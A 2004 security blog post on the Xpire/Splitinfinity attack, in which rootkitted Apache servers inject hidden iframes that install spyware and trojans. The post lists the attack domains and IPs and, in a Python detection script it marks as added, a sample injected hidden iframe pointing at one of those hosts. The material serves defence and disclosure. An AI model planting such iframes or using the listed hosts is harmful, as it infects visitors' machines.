
Saturday, November 20, 2004

Major Hack Attack Discovered: 8MB of infections and DOS Attack.

DOWNLOAD:

Download the complete rundown in PDF format - detailing the server exploit, the packet injection process, the malware downloads, infected sites, how to protect your server and desktop PC:

Xpire/Splitinfinity Exploit: Server hack / Malware install analysis


Mirror, kindly hosted by Spywarewarrior.com

We have discovered that a group of hackers (perhaps even a criminal gang) is hacking web servers all over the Net and installing root kits that dynamically inject code into the pages served from the compromised web servers. The injected code effectively serves as a "front door" to a number of different pages at these domains:

sp2fucked.biz
splitinfinity.info
xpire.info

Similar to Download_Ject, only this time it works on Apache Servers rather than Windows.

Using iframes, a number of sites install anything up to 8MB worth of exploits on a user's machine - viruses, trojans, scripts, malware packages - you name it, you'll end up with it.

Several other domains are used in that installation/exploit process, including:

69.50.168.147
195.178.160.30
213.159.117.133
b00gle.info
coolsearch.biz
newiframe.biz
pizdato.biz

Fair warning: do NOT visit any of these domains unless your box is well defended and updated, and you are prepared to deal with the unexpected.
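Because the rootkit described above injects the iframe into pages at serve time, the HTML on disk looks clean while the HTML a visitor receives does not. One practical check an Apache admin can run is to compare a page as stored with the same page as fetched over HTTP, pull out any iframes that exist only in the served copy, and flag those whose host appears on the list above. The script below is an added example written for this post, not a tool from the original article; the two HTML documents are constructed samples, and the injected iframe in the "served" copy is deliberately modelled on the behaviour the post describes.

```python
import difflib
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts named in the post: the "front door" domains plus the second-stage hosts.
SUSPECT_HOSTS = {
    "sp2fucked.biz", "splitinfinity.info", "xpire.info",
    "69.50.168.147", "195.178.160.30", "213.159.117.133",
    "b00gle.info", "coolsearch.biz", "newiframe.biz", "pizdato.biz",
}


class IframeCollector(HTMLParser):
    """Collects the src attribute of every <iframe> / <frame> in a document."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag in ("iframe", "frame"):
            for name, value in attrs:
                if name == "src" and value:
                    self.srcs.append(value)


def iframe_sources(html):
    parser = IframeCollector()
    parser.feed(html)
    return parser.srcs


def host_of(src):
    """Hostname (or IP literal) of an iframe src, lower-cased; None if unparsable."""
    host = urlparse(src).hostname
    return host.lower() if host else None


def injected_lines(on_disk, as_served):
    """Lines present in the served page but absent from the file on disk."""
    diff = difflib.unified_diff(
        on_disk.splitlines(), as_served.splitlines(), lineterm="", n=0
    )
    return [line[1:] for line in diff
            if line.startswith("+") and not line.startswith("+++")]


def analyse(on_disk, as_served):
    """Compare stored and served copies of one page and report injected frames."""
    on_disk_frames = set(iframe_sources(on_disk))
    injected_frames = [s for s in iframe_sources(as_served) if s not in on_disk_frames]
    known_bad = [s for s in injected_frames if host_of(s) in SUSPECT_HOSTS]
    return {
        "injected_lines": injected_lines(on_disk, as_served),
        "injected_frames": injected_frames,
        "known_bad": known_bad,
    }


# Constructed sample: the page as it sits in the document root ...
ON_DISK = """<html>
<head><title>Example site</title></head>
<body>
<p>Welcome to the site.</p>
</body>
</html>
"""

# ... and the same page as a visitor would receive it from a compromised server
# (a zero-sized hidden frame pointing at one of the listed front-door hosts).
AS_SERVED = ON_DISK.replace(
    "</body>",
    '<iframe src="http://xpire.info/" width=0 height=0 style="display:none"></iframe>\n</body>',
)

if __name__ == "__main__":
    report = analyse(ON_DISK, AS_SERVED)
    for line in report["injected_lines"]:
        print("injected:", line)
    for src in report["known_bad"]:
        print("KNOWN BAD front door:", src)
```

In real use, read the on-disk copy from the document root and the served copy with a plain HTTP client from another machine; a non-empty `injected_lines` on a page you have not edited is itself worth investigating even when the iframe host is not on the list, since the hosts behind the front door are likely to change.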

The software installed on users' PCs appears to vary. Sometimes the exploit pages listed above push porn dialers onto victims' PCs; other times a whole host of spyware and adware packages is installed. The packages that we've seen installed via this exploit include:

180solutions
BlazeFind
BookedSpace
BullsEye Networks
CashBack (Bargain Buddy)
ClickSpring
CoolWebSearch
DyFuca
Hoost
IBIS Toolbar
Internet Optimizer
ISTbar
Power Scan
SideFind
TIB Browser
WebRebates (TopMoxie)
Window AdControl
WindUpdates
YourSiteBar

There have been a few other public discussion threads on the Net about this exploit. In particular, see:

Spyware Warrior Weblog

Ben Edelman.org

DSL Reports

The worst thing is, these malware installations are just a front for massive sets of zombie boxes, and they're getting ready to point them somewhere. If you're an admin of an Apache box, PLEASE ensure that you are fully patched, especially in the area of OpenSSL exploits.

More will likely be made public in the coming weeks, but the infection is making its way round many home users' PCs, and if you end up being hijacked, nothing short of a reformat will remove the garbage from your system.

IE-Spyad will block the domains listed:

https://netfiles.uiuc.edu/ehowes/www/resource.htm

We will be posting regular updates on this as we get them - please keep checking back for more information.

Paperghost

Please help spread the word by placing a link to this article on your sites. As much exposure as possible is needed here.


All Content © Vitalsecurity.org 2006. The content of this site is entirely the opinion of Paperghost, and is in no way endorsed by FaceTime Communications. In other words - have a problem, come see me.